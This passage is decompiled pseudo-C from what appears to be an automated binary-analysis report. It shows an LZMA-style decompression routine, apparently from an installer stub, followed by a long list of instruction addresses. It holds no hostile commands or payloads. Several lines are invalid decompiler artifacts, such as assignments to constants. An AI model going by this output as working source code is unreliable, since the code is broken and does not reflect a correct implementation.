                                                											__ecx =  *(__ebp - 0x10) >> 0xb;
                                                											__ax =  *__esi;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__edi = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												_t217 = __edx + 1; // 0x1
                                                												__ebx = _t217;
                                                												__cx = __ax >> 5;
                                                												__eflags = __eax;
                                                												 *__esi = __ax;
                                                											} else {
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edi;
                                                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                												__ebx = __ebx + __ebx;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											 *(__ebp - 0x44) = __ebx;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L60;
                                                											} else {
                                                												goto L58;
                                                											}
                                                										case 0x10:
                                                											L109:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x10;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t365 = __ebp - 0x70;
                                                											 *_t365 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t365;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											goto L111;
                                                										case 0x11:
                                                											L69:
                                                											__esi =  *(__ebp - 0x58);
                                                											 *(__ebp - 0x84) = 0x12;
                                                											while(1) {
                                                												 *(_t613 - 0x54) = _t606;
                                                												goto L133;
                                                											}
                                                										case 0x12:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												__eax =  *(__ebp - 0x58);
                                                												 *(__ebp - 0x84) = 0x13;
                                                												__esi =  *(__ebp - 0x58) + 2;
                                                												while(1) {
                                                													 *(_t613 - 0x54) = _t606;
                                                													goto L133;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x4c);
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											__eflags = __eax;
                                                											__eax =  *(__ebp - 0x58) + __eax + 4;
                                                											goto L130;
                                                										case 0x13:
                                                											__eflags =  *(__ebp - 0x40);
                                                											if( *(__ebp - 0x40) != 0) {
                                                												_t469 = __ebp - 0x58;
                                                												 *_t469 =  *(__ebp - 0x58) + 0x204;
                                                												__eflags =  *_t469;
                                                												 *(__ebp - 0x30) = 0x10;
                                                												 *(__ebp - 0x40) = 8;
                                                												L144:
                                                												 *(__ebp - 0x7c) = 0x14;
                                                												goto L145;
                                                											}
                                                											__eax =  *(__ebp - 0x4c);
                                                											__ecx =  *(__ebp - 0x58);
                                                											__eax =  *(__ebp - 0x4c) << 4;
                                                											 *(__ebp - 0x30) = 8;
                                                											__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
                                                											L130:
                                                											 *(__ebp - 0x58) = __eax;
                                                											 *(__ebp - 0x40) = 3;
                                                											goto L144;
                                                										case 0x14:
                                                											 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
                                                											__eax =  *(__ebp - 0x80);
                                                											 *(_t613 - 0x88) = _t533;
                                                											goto L1;
                                                										case 0x15:
                                                											__eax = 0;
                                                											__eflags =  *(__ebp - 0x38) - 7;
                                                											0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
                                                											__al = __al & 0x000000fd;
                                                											__eax = (__eflags >= 0) - 1 + 0xb;
                                                											 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
                                                											goto L120;
                                                										case 0x16:
                                                											__eax =  *(__ebp - 0x30);
                                                											__eflags = __eax - 4;
                                                											if(__eax >= 4) {
                                                												_push(3);
                                                												_pop(__eax);
                                                											}
                                                											__ecx =  *(__ebp - 4);
                                                											 *(__ebp - 0x40) = 6;
                                                											__eax = __eax << 7;
                                                											 *(__ebp - 0x7c) = 0x19;
                                                											 *(__ebp - 0x58) = __eax;
                                                											goto L145;
                                                										case 0x17:
                                                											L145:
                                                											__eax =  *(__ebp - 0x40);
                                                											 *(__ebp - 0x50) = 1;
                                                											 *(__ebp - 0x48) =  *(__ebp - 0x40);
                                                											goto L149;
                                                										case 0x18:
                                                											L146:
                                                											__eflags =  *(__ebp - 0x6c);
                                                											if( *(__ebp - 0x6c) == 0) {
                                                												 *(__ebp - 0x88) = 0x18;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x70);
                                                											__eax =  *(__ebp - 0xc);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
                                                											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
                                                											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											_t484 = __ebp - 0x70;
                                                											 *_t484 =  *(__ebp - 0x70) + 1;
                                                											__eflags =  *_t484;
                                                											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
                                                											L148:
                                                											_t487 = __ebp - 0x48;
                                                											 *_t487 =  *(__ebp - 0x48) - 1;
                                                											__eflags =  *_t487;
                                                											L149:
                                                											__eflags =  *(__ebp - 0x48);
                                                											if( *(__ebp - 0x48) <= 0) {
                                                												__ecx =  *(__ebp - 0x40);
                                                												__ebx =  *(__ebp - 0x50);
                                                												0 = 1;
                                                												__eax = 1 << __cl;
                                                												__ebx =  *(__ebp - 0x50) - (1 << __cl);
                                                												__eax =  *(__ebp - 0x7c);
                                                												 *(__ebp - 0x44) = __ebx;
                                                												while(1) {
                                                													 *(_t613 - 0x88) = _t533;
                                                													goto L1;
                                                												}
                                                											}
                                                											__eax =  *(__ebp - 0x50);
                                                											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                											__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                											__eax =  *(__ebp - 0x58);
                                                											__esi = __edx + __eax;
                                                											 *(__ebp - 0x54) = __esi;
                                                											__ax =  *__esi;
                                                											__edi = __ax & 0x0000ffff;
                                                											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
                                                											__eflags =  *(__ebp - 0xc) - __ecx;
                                                											if( *(__ebp - 0xc) >= __ecx) {
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
                                                												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
                                                												__cx = __ax;
                                                												__cx = __ax >> 5;
                                                												__eax = __eax - __ecx;
                                                												__edx = __edx + 1;
                                                												__eflags = __edx;
                                                												 *__esi = __ax;
                                                												 *(__ebp - 0x50) = __edx;
                                                											} else {
                                                												 *(__ebp - 0x10) = __ecx;
                                                												0x800 = 0x800 - __edi;
                                                												0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
                                                												 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                												 *__esi = __cx;
                                                											}
                                                											__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                											if( *(__ebp - 0x10) >= 0x1000000) {
                                                												goto L148;
                                                											} else {
                                                												goto L146;
                                                											}
                                                										case 0x19:
                                                											__eflags = __ebx - 4;
                                                											if(__ebx < 4) {
                                                												 *(__ebp - 0x2c) = __ebx;
                                                												L119:
                                                												_t393 = __ebp - 0x2c;
                                                												 *_t393 =  *(__ebp - 0x2c) + 1;
                                                												__eflags =  *_t393;
                                                												L120:
                                                												__eax =  *(__ebp - 0x2c);
                                                												__eflags = __eax;
                                                												if(__eax == 0) {
                                                													 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
                                                													goto L170;
                                                												}
                                                												__eflags = __eax -  *(__ebp - 0x60);
                                                												if(__eax >  *(__ebp - 0x60)) {
                                                													goto L171;
                                                												}
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
                                                												__eax =  *(__ebp - 0x30);
                                                												_t400 = __ebp - 0x60;
                                                												 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
                                                												__eflags =  *_t400;
                                                												goto L123;
                                                											}
                                                											__ecx = __ebx;
                                                											__eax = __ebx;
                                                											__ecx = __ebx >> 1;
                                                											__eax = __ebx & 0x00000001;
                                                											__ecx = (__ebx >> 1) - 1;
                                                											__al = __al | 0x00000002;
                                                											__eax = (__ebx & 0x00000001) << __cl;
                                                											__eflags = __ebx - 0xe;
                                                											 *(__ebp - 0x2c) = __eax;
                                                											if(__ebx >= 0xe) {
                                                												__ebx = 0;
                                                												 *(__ebp - 0x48) = __ecx;
                                                												L102:
                                                												__eflags =  *(__ebp - 0x48);
                                                												if( *(__ebp - 0x48) <= 0) {
                                                													__eax = __eax + __ebx;
                                                													 *(__ebp - 0x40) = 4;
                                                													 *(__ebp - 0x2c) = __eax;
                                                													__eax =  *(__ebp - 4);
                                                													__eax =  *(__ebp - 4) + 0x644;
                                                													__eflags = __eax;
                                                													L108:
                                                													__ebx = 0;
                                                													 *(__ebp - 0x58) = __eax;
                                                													 *(__ebp - 0x50) = 1;
                                                													 *(__ebp - 0x44) = 0;
                                                													 *(__ebp - 0x48) = 0;
                                                													L112:
                                                													__eax =  *(__ebp - 0x40);
                                                													__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
                                                													if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
                                                														_t391 = __ebp - 0x2c;
                                                														 *_t391 =  *(__ebp - 0x2c) + __ebx;
                                                														__eflags =  *_t391;
                                                														goto L119;
                                                													}
                                                													__eax =  *(__ebp - 0x50);
                                                													 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
                                                													__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
                                                													__eax =  *(__ebp - 0x58);
                                                													__esi = __edi + __eax;
                                                													 *(__ebp - 0x54) = __esi;
                                                													__ax =  *__esi;
                                                													__ecx = __ax & 0x0000ffff;
                                                													__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
                                                													__eflags =  *(__ebp - 0xc) - __edx;
                                                													if( *(__ebp - 0xc) >= __edx) {
                                                														__ecx = 0;
                                                														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
                                                														__ecx = 1;
                                                														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
                                                														__ebx = 1;
                                                														__ecx =  *(__ebp - 0x48);
                                                														__ebx = 1 << __cl;
                                                														__ecx = 1 << __cl;
                                                														__ebx =  *(__ebp - 0x44);
                                                														__ebx =  *(__ebp - 0x44) | __ecx;
                                                														__cx = __ax;
                                                														__cx = __ax >> 5;
                                                														__eax = __eax - __ecx;
                                                														__edi = __edi + 1;
                                                														__eflags = __edi;
                                                														 *(__ebp - 0x44) = __ebx;
                                                														 *__esi = __ax;
                                                														 *(__ebp - 0x50) = __edi;
                                                													} else {
                                                														 *(__ebp - 0x10) = __edx;
                                                														0x800 = 0x800 - __ecx;
                                                														0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
                                                														 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
                                                														 *__esi = __dx;
                                                													}
                                                													__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                													if( *(__ebp - 0x10) >= 0x1000000) {
                                                														L111:
                                                														_t368 = __ebp - 0x48;
                                                														 *_t368 =  *(__ebp - 0x48) + 1;
                                                														__eflags =  *_t368;
                                                														goto L112;
                                                													} else {
                                                														goto L109;
                                                													}
                                                												}
                                                												__ecx =  *(__ebp - 0xc);
                                                												__ebx = __ebx + __ebx;
                                                												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
                                                												__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                												 *(__ebp - 0x44) = __ebx;
                                                												if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
                                                													__ecx =  *(__ebp - 0x10);
                                                													 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
                                                													__ebx = __ebx | 0x00000001;
                                                													__eflags = __ebx;
                                                													 *(__ebp - 0x44) = __ebx;
                                                												}
                                                												__eflags =  *(__ebp - 0x10) - 0x1000000;
                                                												if( *(__ebp - 0x10) >= 0x1000000) {
                                                													L101:
                                                													_t338 = __ebp - 0x48;
                                                													 *_t338 =  *(__ebp - 0x48) - 1;
                                                													__eflags =  *_t338;
                                                													goto L102;
                                                												} else {
                                                													goto L99;
                                                												}
                                                											}
                                                											__edx =  *(__ebp - 4);
                                                											__eax = __eax - __ebx;
                                                											 *(__ebp - 0x40) = __ecx;
                                                											__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
                                                											goto L108;
                                                										case 0x1a:
                                                											L56:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1a;
                                                												goto L170;
                                                											}
                                                											__ecx =  *(__ebp - 0x68);
                                                											__al =  *(__ebp - 0x5c);
                                                											__edx =  *(__ebp - 8);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                											 *( *(__ebp - 0x68)) = __al;
                                                											__ecx =  *(__ebp - 0x14);
                                                											 *(__ecx +  *(__ebp - 8)) = __al;
                                                											__eax = __ecx + 1;
                                                											__edx = 0;
                                                											_t192 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t192;
                                                											goto L79;
                                                										case 0x1b:
                                                											L75:
                                                											__eflags =  *(__ebp - 0x64);
                                                											if( *(__ebp - 0x64) == 0) {
                                                												 *(__ebp - 0x88) = 0x1b;
                                                												goto L170;
                                                											}
                                                											__eax =  *(__ebp - 0x14);
                                                											__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                											__eflags = __eax -  *(__ebp - 0x74);
                                                											if(__eax >=  *(__ebp - 0x74)) {
                                                												__eax = __eax +  *(__ebp - 0x74);
                                                												__eflags = __eax;
                                                											}
                                                											__edx =  *(__ebp - 8);
                                                											__cl =  *(__eax + __edx);
                                                											__eax =  *(__ebp - 0x14);
                                                											 *(__ebp - 0x5c) = __cl;
                                                											 *(__eax + __edx) = __cl;
                                                											__eax = __eax + 1;
                                                											__edx = 0;
                                                											_t274 = __eax %  *(__ebp - 0x74);
                                                											__eax = __eax /  *(__ebp - 0x74);
                                                											__edx = _t274;
                                                											__eax =  *(__ebp - 0x68);
                                                											 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
                                                											 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                											_t283 = __ebp - 0x64;
                                                											 *_t283 =  *(__ebp - 0x64) - 1;
                                                											__eflags =  *_t283;
                                                											 *( *(__ebp - 0x68)) = __cl;
                                                											L79:
                                                											 *(__ebp - 0x14) = __edx;
                                                											goto L80;
                                                										case 0x1c:
                                                											while(1) {
                                                												L123:
                                                												__eflags =  *(__ebp - 0x64);
                                                												if( *(__ebp - 0x64) == 0) {
                                                													break;
                                                												}
                                                												__eax =  *(__ebp - 0x14);
                                                												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
                                                												__eflags = __eax -  *(__ebp - 0x74);
                                                												if(__eax >=  *(__ebp - 0x74)) {
                                                													__eax = __eax +  *(__ebp - 0x74);
                                                													__eflags = __eax;
                                                												}
                                                												__edx =  *(__ebp - 8);
                                                												__cl =  *(__eax + __edx);
                                                												__eax =  *(__ebp - 0x14);
                                                												 *(__ebp - 0x5c) = __cl;
                                                												 *(__eax + __edx) = __cl;
                                                												__eax = __eax + 1;
                                                												__edx = 0;
                                                												_t414 = __eax %  *(__ebp - 0x74);
                                                												__eax = __eax /  *(__ebp - 0x74);
                                                												__edx = _t414;
                                                												__eax =  *(__ebp - 0x68);
                                                												 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
                                                												 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
                                                												 *(__ebp - 0x30) =  *(__ebp - 0x30) - 1;
                                                												__eflags =  *(__ebp - 0x30);
                                                												 *( *(__ebp - 0x68)) = __cl;
                                                												 *(__ebp - 0x14) = _t414;
                                                												if( *(__ebp - 0x30) > 0) {
                                                													continue;
                                                												} else {
                                                													L80:
                                                													 *(__ebp - 0x88) = 2;
                                                													goto L1;
                                                												}
                                                											}
                                                											 *(__ebp - 0x88) = 0x1c;
                                                											goto L170;
                                                									}
                                                								}
                                                								L171:
                                                								_t535 = _t534 | 0xffffffff;
                                                								goto L172;
                                                							}
                                                						}
                                                					}
                                                				}
                                                			}













                                                0x00000000
                                                0x00406f07
                                                0x00406f07
                                                0x00406f0b
                                                0x00406f34
                                                0x00406f3e
                                                0x00406f0d
                                                0x00406f16
                                                0x00406f23
                                                0x00406f26
                                                0x0040726a
                                                0x0040726a
                                                0x0040726d
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x004072bb
                                                0x004072bf
                                                0x0040746e
                                                0x00407484
                                                0x0040748c
                                                0x00407493
                                                0x00407495
                                                0x0040749c
                                                0x004074a0
                                                0x004074a0
                                                0x004072cb
                                                0x004072d2
                                                0x004072da
                                                0x004072dd
                                                0x004072e0
                                                0x004072e0
                                                0x004072e6
                                                0x004072e6
                                                0x00406a82
                                                0x00406a82
                                                0x00406a82
                                                0x00406a8b
                                                0x00000000
                                                0x00000000
                                                0x00406a91
                                                0x00000000
                                                0x00406a9c
                                                0x00000000
                                                0x00000000
                                                0x00406aa5
                                                0x00406aa8
                                                0x00406aab
                                                0x00406aaf
                                                0x00000000
                                                0x00000000
                                                0x00406ab5
                                                0x00406ab8
                                                0x00406aba
                                                0x00406abb
                                                0x00406abe
                                                0x00406ac0
                                                0x00406ac1
                                                0x00406ac3
                                                0x00406ac6
                                                0x00406acb
                                                0x00406ad0
                                                0x00406ad9
                                                0x00406aec
                                                0x00406aef
                                                0x00406afb
                                                0x00406b23
                                                0x00406b25
                                                0x00406b33
                                                0x00406b33
                                                0x00406b37
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406b27
                                                0x00406b27
                                                0x00406b2a
                                                0x00406b2b
                                                0x00406b2b
                                                0x00000000
                                                0x00406b27
                                                0x00406b01
                                                0x00406b06
                                                0x00406b06
                                                0x00406b0f
                                                0x00406b17
                                                0x00406b1a
                                                0x00000000
                                                0x00406b20
                                                0x00406b20
                                                0x00000000
                                                0x00406b20
                                                0x00000000
                                                0x00406b3d
                                                0x00406b3d
                                                0x00406b41
                                                0x004073ed
                                                0x00000000
                                                0x004073ed
                                                0x00406b4a
                                                0x00406b5a
                                                0x00406b5d
                                                0x00406b60
                                                0x00406b60
                                                0x00406b60
                                                0x00406b63
                                                0x00406b67
                                                0x00000000
                                                0x00000000
                                                0x00406b69
                                                0x00406b6f
                                                0x00406b99
                                                0x00406b9f
                                                0x00406ba6
                                                0x00000000
                                                0x00406ba6
                                                0x00406b75
                                                0x00406b78
                                                0x00406b7d
                                                0x00406b7d
                                                0x00406b88
                                                0x00406b90
                                                0x00406b93
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bd8
                                                0x00406bde
                                                0x00406be1
                                                0x00406bee
                                                0x00406bf6
                                                0x0040726a
                                                0x00000000
                                                0x00000000
                                                0x00406bad
                                                0x00406bad
                                                0x00406bb1
                                                0x004073fc
                                                0x00000000
                                                0x004073fc
                                                0x00406bbd
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bc8
                                                0x00406bcb
                                                0x00406bce
                                                0x00406bd1
                                                0x00406bd6
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x0040726d
                                                0x0040726d
                                                0x00407273
                                                0x00407279
                                                0x0040727f
                                                0x00407299
                                                0x0040729c
                                                0x004072a2
                                                0x004072ad
                                                0x004072af
                                                0x00407281
                                                0x00407281
                                                0x00407290
                                                0x00407294
                                                0x00407294
                                                0x004072b9
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406bfe
                                                0x00406c00
                                                0x00406c03
                                                0x00406c74
                                                0x00406c77
                                                0x00406c7a
                                                0x00406c81
                                                0x00406c8b
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040726a
                                                0x00406c05
                                                0x00406c09
                                                0x00406c0c
                                                0x00406c0e
                                                0x00406c11
                                                0x00406c14
                                                0x00406c16
                                                0x00406c19
                                                0x00406c1b
                                                0x00406c20
                                                0x00406c23
                                                0x00406c26
                                                0x00406c2a
                                                0x00406c31
                                                0x00406c34
                                                0x00406c3b
                                                0x00406c3f
                                                0x00406c47
                                                0x00406c47
                                                0x00406c47
                                                0x00406c41
                                                0x00406c41
                                                0x00406c41
                                                0x00406c36
                                                0x00406c36
                                                0x00406c36
                                                0x00406c4b
                                                0x00406c4e
                                                0x00406c6c
                                                0x00406c6e
                                                0x00000000
                                                0x00406c50
                                                0x00406c50
                                                0x00406c53
                                                0x00406c56
                                                0x00406c59
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5b
                                                0x00406c5e
                                                0x00406c61
                                                0x00406c63
                                                0x00406c64
                                                0x00406c67
                                                0x00000000
                                                0x00406c67
                                                0x00000000
                                                0x00406e9d
                                                0x00406ea1
                                                0x00406ebf
                                                0x00406ec2
                                                0x00406ec9
                                                0x00406ecc
                                                0x00406ecf
                                                0x00406ed2
                                                0x00406ed5
                                                0x00406ed8
                                                0x00406eda
                                                0x00406ee1
                                                0x00406ee2
                                                0x00406ee4
                                                0x00406ee7
                                                0x00406eea
                                                0x00406eed
                                                0x00406eed
                                                0x00406ef2
                                                0x00000000
                                                0x00406ef2
                                                0x00406ea3
                                                0x00406ea6
                                                0x00406ea9
                                                0x00406eb3
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00406f4a
                                                0x00406f4e
                                                0x00000000
                                                0x00000000
                                                0x00406f54
                                                0x00406f58
                                                0x00000000
                                                0x00000000
                                                0x00406f5e
                                                0x00406f60
                                                0x00406f64
                                                0x00406f64
                                                0x00406f67
                                                0x00406f6b
                                                0x00000000
                                                0x00000000
                                                0x00406fbb
                                                0x00406fbf
                                                0x00406fc6
                                                0x00406fc9
                                                0x00406fcc
                                                0x00406fd6
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040726a
                                                0x00406fc1
                                                0x00000000
                                                0x00000000
                                                0x00406fe2
                                                0x00406fe6
                                                0x00406fed
                                                0x00406ff0
                                                0x00406ff3
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406fe8
                                                0x00406ff6
                                                0x00406ff9
                                                0x00406ffc
                                                0x00406ffc
                                                0x00406fff
                                                0x00407002
                                                0x00407005
                                                0x00407005
                                                0x00407008
                                                0x0040700f
                                                0x00407014
                                                0x00000000
                                                0x00000000
                                                0x004070a2
                                                0x004070a2
                                                0x004070a6
                                                0x00407444
                                                0x00000000
                                                0x00407444
                                                0x004070ac
                                                0x004070af
                                                0x004070b2
                                                0x004070b6
                                                0x004070b9
                                                0x004070bf
                                                0x004070c1
                                                0x004070c1
                                                0x004070c1
                                                0x004070c4
                                                0x004070c7
                                                0x00000000
                                                0x00000000
                                                0x00406c97
                                                0x00406c97
                                                0x00406c9b
                                                0x00407408
                                                0x00000000
                                                0x00407408
                                                0x00406ca1
                                                0x00406ca4
                                                0x00406ca7
                                                0x00406cab
                                                0x00406cae
                                                0x00406cb4
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb6
                                                0x00406cb9
                                                0x00406cbc
                                                0x00406cbc
                                                0x00406cbf
                                                0x00406cc2
                                                0x00000000
                                                0x00000000
                                                0x00406cc8
                                                0x00406cce
                                                0x00000000
                                                0x00000000
                                                0x00406cd4
                                                0x00406cd4
                                                0x00406cd8
                                                0x00406cdb
                                                0x00406cde
                                                0x00406ce1
                                                0x00406ce4
                                                0x00406ce5
                                                0x00406ce8
                                                0x00406cea
                                                0x00406cf0
                                                0x00406cf3
                                                0x00406cf6
                                                0x00406cf9
                                                0x00406cfc
                                                0x00406cff
                                                0x00406d02
                                                0x00406d1e
                                                0x00406d21
                                                0x00406d24
                                                0x00406d27
                                                0x00406d2e
                                                0x00406d32
                                                0x00406d34
                                                0x00406d38
                                                0x00406d04
                                                0x00406d04
                                                0x00406d08
                                                0x00406d10
                                                0x00406d15
                                                0x00406d17
                                                0x00406d19
                                                0x00406d19
                                                0x00406d3b
                                                0x00406d42
                                                0x00406d45
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d4b
                                                0x00000000
                                                0x00406d50
                                                0x00406d50
                                                0x00406d54
                                                0x00407414
                                                0x00000000
                                                0x00407414
                                                0x00406d5a
                                                0x00406d5d
                                                0x00406d60
                                                0x00406d64
                                                0x00406d67
                                                0x00406d6d
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d6f
                                                0x00406d72
                                                0x00406d75
                                                0x00406d75
                                                0x00406d75
                                                0x00406d7b
                                                0x00000000
                                                0x00000000
                                                0x00406d7d
                                                0x00406d80
                                                0x00406d83
                                                0x00406d86
                                                0x00406d89
                                                0x00406d8c
                                                0x00406d8f
                                                0x00406d92
                                                0x00406d95
                                                0x00406d98
                                                0x00406d9b
                                                0x00406db3
                                                0x00406db6
                                                0x00406db9
                                                0x00406dbc
                                                0x00406dbc
                                                0x00406dbf
                                                0x00406dc3
                                                0x00406dc5
                                                0x00406d9d
                                                0x00406d9d
                                                0x00406da5
                                                0x00406daa
                                                0x00406dac
                                                0x00406dae
                                                0x00406dae
                                                0x00406dc8
                                                0x00406dcf
                                                0x00406dd2
                                                0x00000000
                                                0x00406dd4
                                                0x00000000
                                                0x00406dd4
                                                0x00406dd2
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00406dd9
                                                0x00000000
                                                0x00000000
                                                0x00406e14
                                                0x00406e14
                                                0x00406e18
                                                0x00407420
                                                0x00000000
                                                0x00407420
                                                0x00406e1e
                                                0x00406e21
                                                0x00406e24
                                                0x00406e28
                                                0x00406e2b
                                                0x00406e31
                                                0x00406e33
                                                0x00406e33
                                                0x00406e33
                                                0x00406e36
                                                0x00406e39
                                                0x00406e39
                                                0x00406e3f
                                                0x00406ddd
                                                0x00406ddd
                                                0x00406de0
                                                0x00000000
                                                0x00406de0
                                                0x00406e41
                                                0x00406e41
                                                0x00406e44
                                                0x00406e47
                                                0x00406e4a
                                                0x00406e4d
                                                0x00406e50
                                                0x00406e53
                                                0x00406e56
                                                0x00406e59
                                                0x00406e5c
                                                0x00406e5f
                                                0x00406e77
                                                0x00406e7a
                                                0x00406e7d
                                                0x00406e80
                                                0x00406e80
                                                0x00406e83
                                                0x00406e87
                                                0x00406e89
                                                0x00406e61
                                                0x00406e61
                                                0x00406e69
                                                0x00406e6e
                                                0x00406e70
                                                0x00406e72
                                                0x00406e72
                                                0x00406e8c
                                                0x00406e93
                                                0x00406e96
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00406e98
                                                0x00000000
                                                0x00407125
                                                0x00407125
                                                0x00407129
                                                0x00407450
                                                0x00000000
                                                0x00407450
                                                0x0040712f
                                                0x00407132
                                                0x00407135
                                                0x00407139
                                                0x0040713c
                                                0x00407142
                                                0x00407144
                                                0x00407144
                                                0x00407144
                                                0x00407147
                                                0x00000000
                                                0x00000000
                                                0x00406ef5
                                                0x00406ef5
                                                0x00406ef8
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x00000000
                                                0x00407234
                                                0x00407238
                                                0x0040725a
                                                0x0040725d
                                                0x00407267
                                                0x0040726a
                                                0x0040726a
                                                0x00000000
                                                0x0040726a
                                                0x0040726a
                                                0x0040723a
                                                0x0040723d
                                                0x00407241
                                                0x00407244
                                                0x00407244
                                                0x00407247
                                                0x00000000
                                                0x00000000
                                                0x004072f1
                                                0x004072f5
                                                0x00407313
                                                0x00407313
                                                0x00407313
                                                0x0040731a
                                                0x00407321
                                                0x00407328
                                                0x00407328
                                                0x00000000
                                                0x00407328
                                                0x004072f7
                                                0x004072fa
                                                0x004072fd
                                                0x00407300
                                                0x00407307
                                                0x0040724b
                                                0x0040724b
                                                0x0040724e
                                                0x00000000
                                                0x00000000
                                                0x004073e2
                                                0x004073e5
                                                0x004072e6
                                                0x00000000
                                                0x00000000
